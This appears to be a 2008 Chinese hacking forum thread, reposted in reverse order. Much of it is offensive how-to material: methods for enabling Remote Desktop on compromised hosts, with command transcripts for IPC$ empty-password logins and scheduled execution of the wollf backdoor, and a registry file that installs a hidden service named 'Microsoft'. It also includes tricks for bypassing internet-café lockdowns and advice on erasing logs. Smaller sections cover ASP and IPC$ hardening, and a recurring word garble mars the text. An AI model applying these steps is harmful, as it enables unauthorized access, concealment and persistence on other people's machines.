  电子邮件攻击主要表现为两种方式:

  (1)是电子邮件轰炸和电子邮件“*雪球”,也就是通常所说的邮件炸弹,指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件,致使受害人邮箱被“炸”,严重者可能会给电子邮件服务器想跳楼作系统带来危险,甚至瘫痪;

  (2)是电子邮件欺骗,攻击者佯称自己为系统管理员(邮件地址和系统管理员完全相同),给用户发送邮件要求用户修改口令(口令可能为指定字符串)或在貌似正常的附件中加载病毒或其他木马程序。
5、通过一个节点来攻击其他节点

  攻击者在突破一台主机后,往往以此主机作为根据地,攻击其他主机(以隐蔽其入侵路径,避免留下蛛丝马迹)。他们可以使用网络监听方法,尝试攻破同一网络内的其他主机;也可以通过IP欺骗和主机信任关系,攻击其他主机。

  这类攻击很狡猾,但由于某些技术很难掌握,如TCP/IP欺骗攻击。攻击者通过外部计算机伪装成另一台合法机器来实现。它能磙坏两台机器间通信链路上的数据,其伪装的目的在于哄骗网络中的其它机器误将其攻击者作为合法机器加以接受,诱使其它机器向他发送据或允许它修改数据。TCP/IP欺骗可以发生 TCP/IP系统的所有层次上,包括数据链路层、网络层、运输层及应用层均容易受到影响。如果底层受到损害,则应用层的所有协议都将处于危险之中。另外由于用户本身不直接与底层相互相交流,因而对底层的攻击更具有欺骗性。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 45 发表于: 2008-06-14 22:46:13
开启3389的5种方法(下)

------------------------------------------------------------------------------------------
C:\documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org/
------------------------------------------------------------------------------------------
说明:
使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -connect IP 7614
7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。

------------------------------------------------------------------------------------------
[server@D:\WINNT\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
© 版权所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
说明:
输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。


------------------------------------------------------------------------------------------
D:\WINNT\system32>cd..
cd..

D:\WINNT>dir h*.*
dir h*.*
驱动器 D 中的卷没有标签。
卷的序列号是 1CE5-2615

D:\WINNT 的目录

2002-11-27 03:07 Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 个文件 35,328 字节
1 个目录 9,049,604,096 可用字节

D:\WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
说明:
因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。


==========================================================================================
D:\WINNT>exit
exit

Command "DOS" succeed.

[server@D:\WINNT\system32]#reboot


Command "REBOOT" succeed.

[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------------------------------------------------
说明:
由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT
命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下

。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装

终端服务。

到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务!

我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对

目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口

来躲过普通扫描器的扫描!修改方法如下:
修改服务器端的端口设置 ,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
第二个地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 
PortNumber值,默认是3389,修改成所希望的端口,比如1314
现在这样就可以了。重启系统吧。
注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\
表示具体的某个RDP-TCP连结。
重启过后,看看端口有没有改。
小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。
 

==========================================================================================
第五种方法:
==========================================================================================

 
一.原理性基本安装
1.将如下注册表键值导入 "肉机" 的注册表中:

-------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
etcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

-----------
2.重新起动"肉机"。

3.使用本地的3398客户端,连接 "肉机" .

4.优(缺)点:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".

5.与"sysocmgr /iysoc.inf /u:u.txt /q" 的比较:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 处于已安装状态.
B."肉机"中 "开始-->程序-->管理工具" 增加 "终端服务管理器","终端服务配置" 和 "终端服务客户端生成器".
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".
E.需要拷贝几兆的文件到"肉机"中.

二.抛砖引玉性"隐蔽"安装:

1.将"肉机"中 "c:\winnt\system32\termsrv.exe" 文件作一备份,命名为"eventlog.exe",仍将其放入目录 "c:\winnt\system32\"

2.将如下注册表键值导入 "肉机" 的注册表中:

------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
etcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"

---------------

3.重新起动"肉机"。

4.使用本地的3398客户端,连接“肉机”。

5.优(缺)点:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 没有变化,保持原始状态.
D."肉机"中 "开始-->程序-->管理工具-->服务" 增加 "Microsoft"
E."肉机"中 "Windows 任务管理器-->进程" 内,增加 "eventlog.exe".

三.理论简介

如此简单? 只修改注册表? 不需要拷贝W2k源文件?

让我们从一条命令行语句说起,这条语句是: "sysocmgr /iysoc.inf /u:u.txt /q" . 其中 u.txt 如下:
-------------
[Components]
TsEnable = on
-------------

首先认识 "sysoc.inf"."sysoc.inf" 是安装信息文件,位于 "c:\winnt\inf". 打开它,在 "[Components]" 节,找到与 "终端服务" 有关的条目:

"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2"

这里引出另外一个安装信息文件: "TsOc.inf". 这个文件同样位于 "c:\winnt\inf".

打开这个文件,你会发现,如同 windows 环境下的软件安装, "终端服务" 的安装, 也主要由三个部分: 拷贝源文件,注册 DLL 以及修改注册表.

在 [TerminalServices.FreshInstall] 节 和 "File Sections" 部分,你会发现 "终端服务" 所需的系统文件,DLL 和驱动, 随同 W2k 的初始安装,都已安然就位.

为什么 "终端服务" 的常规安装和命令行安装都需要拷贝W2k源文件? 事实上,所拷贝的是"终端服务"客户端软件,既 "开始-->程序-->管理工具-->终端服务客户端生成器" 生成客户软盘需要的文件.

各位 "黑友" 提供的包或工具,里面包括的W2k源文件,都是 "tsc32" 打头的. 关连 "TsOc.inf" 的 "File Sections" 部分和另外一个文件 "c:\winnt\inf\layout.inf",你将会得到证实.

"终端服务"的安装,需要注册俩个 "DLL". 这俩个 "DLL" 同样早早就住在系统里,想必它们一定也有了身份证.

"TsOc.inf" 文件一半的内容是关于修改注册表. 但"终端服务" 需要的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系统安装时注册过的.

我们回头看一下那个命令行语句, "/u:" 参数后面的无人职守安装信息文件 "u.txt". "TsEnable = on" ?

"TsOc.inf" 文件 [Optional Components] 节中有三个选项, "TerminalServices", "TSEnable" ,"TSClients".

"TerminalServices" 如上所述,在系统初始安装时,已经就序. "TSClients" 与 "终端服务" 没有直接的关系.

我们在 "TsOc.inf" 找到 "[TsEnable]" 节. 此节中有用的信息只有一条 "ToggleOnSection = TerminalServices.ToggleOn". 再转到 [TerminalServices.ToggleOn] 节.

[TerminalServices.ToggleOn] 节告诉我们,下一站是 "Reg.ToggleOn", 沿着这个线索,我们来到 [Reg.ToggleOn], 你看到什么?
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 44 发表于: 2008-06-14 22:45:52
开启3389的5种方法(上)

一:使用的工具:
1:ipcscan扫描器
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IPort )
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)
4:cscript (在system32文件夹下;98想跳楼作系统可能没有
二:步骤:
1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发)

2:用rots.vbs开启终端服务

说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr


三:常见问题:

1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.

2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧.

3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.
 

 

==========================================================================================
第二种方法:
==========================================================================================
进入后:TELNET上去!

c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
或者!
c:\>echo [Components] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q
等会自动启后就OK


或者:
在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意) echo [Components] > c:\sql

echo TSEnable = on >>

c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

net use \\ip地址\ipc$ 密码 /user:用户名(一般默认:administrator)

利用at time 获取对方服务器时间。

copy 路径:\xxx.bat \\ip地址\$c:\winnt

at time 00:00:00 xxx.bat

服务器执行命令后,服务器将重新启动,利用3389登陆就OK了!
 

 

==========================================================================================

第三种方法:
==========================================================================================
进入后,先检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
//这是建立无人参与的安装参数
c:\>type c:\rock
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-----------------------------------------------------

这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

问题和建议:

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.

B 一次不行可以再试一次,在实际中很有作用.

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.
 

 

==========================================================================================
第四种方法:
==========================================================================================

C:\documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------连接成功!
命令成功完成。

C:\documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi
n$------------------------------拷贝wollf.exe到目标计算机的admin$目录
已复制 1 个文件。

C:\documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
已复制 1 个文件。

C:\documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的当前时间是 2002/12/1 上午 06:37
命令成功完成。

C:\documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行
------------------------------------------------------------------------------------------
说明:
wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内

容有关的命令参数,它的高级用法不做补充。
hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。
2分钟后......
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 43 发表于: 2008-06-14 22:45:32
常见ASP脚本攻击及防范技巧

由于ASP的方便易用,越来越多的网站后台程序都使用ASP脚本语言。但是,由于ASP本身存在一些安全漏洞,稍不小心就会给黑客提供可乘之机。事实上,安全不仅是网管的事,编程人员也必须在某些安全细节上注意,养成良好的安全习惯,否则会给自己的网站带来巨大的安全隐患。目前,大多数网站上的ASP程序有这样那样的安全漏洞,但如果编写程序的时候注意一点的话,还是可以避免的。

  1、用户名与口令被破解

  攻击原理:用户名与口令,往往是黑客们最感兴趣的东西,如果被通过某种方式看到源代码,后果是严重的。

  防范技巧:涉及用户名与口令的程序最好封装在服务器端,尽量少在ASP文件里出现,涉及与数据库连接的用户名与口令应给予最小的权限。出现次数多的用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及与数据库连接,在理想状态下只给它以执行存储过程的权限,千万不要直接给予该用户修改、插入、删除记录的权限。

  2、验证被绕过

  攻击原理:现在需要经过验证的ASP程序大多是在页面头部加一个判断语句,但这还不够,有可能被黑客绕过验证直接进入。

  防范技巧:需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。
3、inc文件泄露问题

  攻击原理:当存在ASP的主页正在制作且没有进行最后调试完成以前,可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎对这些网页进行查找,会得到有关文件的定位,并能在浏览器中查看到数据库地点和结构的细节,并以此揭示完整的源代码。

  防范技巧:程序员应该在网页发布前对它进行彻底的调试;安全专家则需要加固ASP文件以便外部的用户不能看到它们。首先对.inc文件内容进行加密,其次也可以使用.asp文件代替.inc文件使用户无法从浏览器直接观看文件的源代码。inc文件的文件名不要使用系统默认的或者有特殊含义容易被用户猜测到的名称,尽量使用无规则的英文字母。

  4、自动备份被下载

  攻击原理:在有些编辑ASP程序的工具中,当创建或者修改一个ASP文件时,编辑器自动创建一个备份文件,比如:UltraEdit就会备份一个. bak文件,如你创建或者修改了some.asp,编辑器会自动生成一个叫some.asp.bak文件,如果你没有删除这个bak文件,攻击者可以直接下载some.asp.bak文件,这样some.asp的源程序就会被下载。

  防范技巧:上传程序之前要仔细检查,删除不必要的文档。对以BAK为后缀的文件要特别小心。

  5、特殊字符

  攻击原理:输入框是黑客利用的一个目标,他们可以通过输入脚本语言等对用户客户端造成损坏;如果该输入框涉及数据查询,他们会利用特殊查询语句,得到更多的数据库数据,甚至表的全部。因此必须对输入框进行过滤。但如果为了提高效率仅在客户端进行输入合法性检查,仍有可能被绕过。

  防范技巧:在处理类似留言板、BBS等输入框的ASP程序中,最好屏蔽掉HTML、javascript、VBscript语句,如无特殊要求,可以限定只允许输入字母与数字,屏蔽掉特殊字符。同时对输入字符的长度进行限制。而且不但要在客户端进行输入合法性检查,同时要在服务器端程序中进行类似检查 6、数据库下载漏洞

  攻击原理:在用Access做后台数据库时,如果有人通过各种方法知道或者猜到了服务器的Access数据库的路径和数据库名称,那么他也能够下载这个Access数据库文件,这是非常危险的。

  防范技巧:

  (1)为你的数据库文件名称起个复杂的非常规的名字,并把它放在几层目录下。所谓 “非常规”,打个比方说,比如有个数据库要保存的是有关书籍的信息,可不要给它起个“book.mdb”的名字,而要起个怪怪的名称,比如d34ksfslf.mdb,并把它放在如./kdslf/i44/studi/的几层目录下,这样黑客要想通过猜的方式得到你的Access数据库文件就难上加难了。

  (2)不要把数据库名写在程序中。有些人喜欢把DSN写在程序中,比如:

  DBPath = Server.MapPath(“cmddb.mdb”)

  conn.Open “driver={Microsoft Access Driver (*.mdb)};dbq=” & DBPath

  假如万一给人拿到了源程序,你的Access数据库的名字就一览无余了。因此建议你在ODBC里设置数据源,再在程序中这样写:

  conn.open“shujiyuan”

  (3)使用Access来为数据库文件编码及加密。首先在“工具→安全→加密/解密数据库”中选取数据库(如:employer.mdb),然后按确定,接着会出现“数据库加密后另存为”的窗口,可存为:“employer1.mdb”。

  要注意的是,以上的动作并不是对数据库设置密码,而只是对数据库文件加以编码,目的是为了防止他人使用别的工具来查看数据库文件的内容。

  接下来我们为数据库加密,首先打开经过编码了的 employer1.mdb,在打开时,选择“独占”方式。然后选取功能表的“工具→安全→设置数据库密码”,接着输入密码即可。这样即使他人得到了 employer1.mdb文件,没有密码他也是无法看到 employer1.mdb中的内容

破解的关键在于如何能访问硬盘,因为你要执行的文件或寻找万象幻境的密码都离不开硬盘。那么如何进入硬盘呢?往下看,共为你准备了10种方法:


1.利用输入法漏洞


输入法漏洞不是中文Win2000的漏洞吗?没错!不过万象幻境也有这个漏洞!方法很简单:按ctrl+shift打开[M$]拼音输入法(如没有用其它输入法也可,方法类似),然后将光标插入会员卡号的文本输入框内,接着开始往里面输入任意一个拼音字母,然后就会出现拼音的状态条,在状态条上点击右键,或用键盘上的属性键,就会出现一个下拉菜单,选择其中的定义词组(放心,就算系统限制右键,在这也不管用)然后选择文件菜单里面的保存,就会调出保存对话框,然后随便选择一个文件夹,点击右键,选择资源管理器,打开,一切就OK啦!如果鼠标被限定在那个锁定窗口内,就用键盘想跳楼作。


2.利用QQ


网吧别的软件可以没有,但QQ绝对会有,否则就不会有那么多人去网吧了。打开QQ,随便选择一个好友,点传送文件,就会出现一个小窗口,让你选择文件,呵呵,秘密就在这里,先找到C盘下的注册表编辑器Regedit.exe,先用鼠标选中该文件,松开鼠标,用鼠标右键点击该文件,这时千万不要松开右键,点鼠标左键,就会出来右键菜单,里面什么都有,删除,打开,复制,呵呵,和不在美萍的限制下一样的,这下你想干什么就可以干什么了。


3.利用Foxmail或Outlook Express


以Foxmail为例来讲讲,Outlook Express类同。点“邮件”->“写新邮件”,在出现的“写邮件”窗口中点击“邮件”菜单下的“增加附件”,就会调出“打开”对话框,可以看到驱动器列表和目录列表了,想怎么样自己看着办吧!


4.利用TE


TE是QQ附带的浏览器,启动它,在地址栏直接输入C:回车,看看出现什么了?哈哈,C盘尽在眼前。但到了C盘有什么用呢,如果网管做了手脚,你还是不能执行文件。但是当我们用鼠标右键点上你要执行的文件(注意,是鼠标的右键),此时没有任何反映。此时不要松开鼠标右键,再按下鼠标左键,哈哈,看到鼠标正常的右键菜单了吧。这时点击"打开"选项,文件就被打开了。


5.用看图软件Acdsee


如果网吧中有这个软件,利用它的浏览功能,可以轻松的找到任何一个文件!呵呵,它的浏览功能帮过我不少忙,其实只要是有驱动器列表和目录列表控件的软件几乎都可以被利用,因为那是Windows的标准控件,一般是很难屏蔽的。


6.升级网吧管理专家


你可以“好心”的帮网吧管理者把网吧管理专家升级一下,那就什么密码也没有了,想干什么都可以了。不过,被发现了暴扁一顿可别来找我。


7.利用IE


先打开IE,再打开“收藏”菜单,用鼠标将“链接”拖入IE地址栏下面的空白区,然后点击“向上”、“向上”、再“向上”,看到了什么?对了,是C盘根目录!此时已经可以按方法5中所说方法为所欲为了。


8.Win98登入过程


在进入Win98登入过程中,网吧管理专家把鼠标锁定在右边的时候,左键单击屏幕,然后按F1键(多按几次)在彻底出现登入窗口的时候,如果成功的话会出现“Windows帮助”窗口,在“选项”下拉菜单中选择“按Web 帮助”,在“Web 帮助”窗口中点击“联机支持”的链接,这时弹出一个Internet Explorer浏览器了。只要在地址栏中输入要访问的站点(如在地址栏里输入http://www.sina.com.cn)或盘符(如c盘 c:\ ),如果网吧管理专家对硬盘进行保护使我们没法访问某个盘符时,可以用按“F3”键(windows默认的查找热键)弹出一个查找窗口后,输入你想打开的文件或文件夹进行查找,找到后即可打开。


9.桌面快捷方式


对桌面上的快捷方式点击右键,在弹出的菜单中选择“属性”->“更改图标”->“浏览”,可以打开文件浏览窗口,看是不是C盘出来了,然后点击向上到C盘windows文件夹找到系统工具的系统配置实用程序将自启动程序去掉,重启机器这样就可以啦!


10.Ctrl+Alt+Del


上面说的方法太麻烦了,这个简单。在看到窗口的画面时就按Ctrl+Alt+Del,大家会看到一个client项。结束它,但这时候还不行。过一会儿还会启动一次,再按Ctrl+Alt+Del结束它(这个步骤很不好使,要试好多次才能掌握),太快不行,太慢也不行,试多了就行了,最后你就会百试百灵。有的网吧管理专家下了补丁,会运行多一次,你再多结束一次任务就行了。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 42 发表于: 2008-06-14 22:45:09
ipc$详细解说大全(4)
4 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了


嗯,好了,两种基本方法都讲了。如果你对上面的想跳楼作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec \\tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。
讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面


十三 如何防范ipc$入侵


1 禁止空连接进行枚举(此想跳楼作并不能阻止空连接的建立)

方法1:
运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:1
如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但限制通过这种连接得到列举SAM帐号和共享等信息;在Windows 2000 中增加了"2",限制所有匿名访问除非特别授权,如果设置为2的话,可能会有一些其他问题发生,建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。

方法2:
在本地安全设置-本地策略-安全选项-在'对匿名连接的额外限制'中做相应设置


2 禁止默认共享

1)察看本地共享资源
运行-cmd-输入net share

2)删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)

3)停止server服务
net stop server /y (重新启动后server服务会重新开启)

4)禁止自动打开默认共享(此想跳楼作并未关闭ipc$共享)
运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加。


3 关闭ipc$和默认共享依赖的服务:server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用
这时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于lanmanserver,不要管它。


4 屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。

1)139端口可以通过禁止NBT来屏蔽
本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项

2)445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完后重启机器

注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。


3)安装防火墙进行端口过滤


5 设置复杂密码,防止通过ipc$穷举出密码。


十四 ipc$入侵问答精选


上面说了一大堆的理论东西,但在实际中你会遇到各种各样的问题,因此为了给予大家最大的帮助,我看好几个安全论坛,找了n多的帖子,从中整理了一些有代表性的问答,其中的一些答案是我给出的,一些是论坛上的回复,如果有什么疏漏和错误,还请包涵。


1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?

答:留下记录是一定的,你走后用程序删除就可以了,或者用肉鸡入侵。


2.你看下面的情况是为什么,可以连接但不能复制
net use \\***.***.***.***\ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功

答:可能有两个原因:
1)你的权限不够,不能访问默认共享;

2)对方没有开启admin$默认共享,不要认为能进行ipc$连接,对方就一定开了默认共享(很多人都这么以为,误区!!),此时你可以试试别的默认共享或普通共享,比如c$,d$,c,d等,如果还是不行,就要看你的权限了,如果是管理员权限,你可以开telnet,如果能成功,在给它开共享也行。


3.如果对方开了IPC$,且能建立空联接,但打开C、D盘时,都要求密码,我知道是空连接没有太多的权限,但没别的办法了吗?

答:建议先用流光或者别的什么猜解一下密码,如果猜不出来,只能放弃,毕竟空连接的能力有限。


4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view \\ip发现它没开默认共享,我该怎么办?

答:首先纠正你的一个错误,用net view是无法看到默认共享的。既然你现在有管理员权限,而且对方又开了ipc$,建议你用opentelnet.exe这个小程序打开它的telent,在获得了这个shell之后,做什么都可以了。


5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事?
net uset ccbirds /add

答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell,只有在获得一个shell之后,你才能在远程建立一个帐户,否则你的想跳楼作只是在本地进行。


6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的机子上却不行,每次都提示“拒绝访问,已复制0个文件”,是不是对方有什么服务没开,我该怎么办?

答:不能copy文件有多个可能,除了权限不够外,还可能是对方c$,d$等默认管理共享没开,或者是对方为NTFS文件格式,通过设置,管理员也未必能远程写文件。既然你有管理员权限,那就开telnet上去吧,然后在开它的共享。







7.我用Win98能与对方建立ipc$连接吗?

答:不可以的,要进行ipc$的想跳楼作,建议用win2000


8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话,但用nbtstat -A IP 却无法导出用户列表,这是为什么?

答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;或者你自己的NBT没有打开,netstat是建立在NBT之上的。  


9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么回事?

答:呵呵,这说明你与目标主机建立了一个以上的ipc$连接,这是不允许的,把其他的删掉吧:net use \\*.*.*.*\ipc$ /del


10.我在映射的时候出现:
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事?

答:你也太粗心了吧,这说明你的h盘正在使用,映射到别的盘符吧!


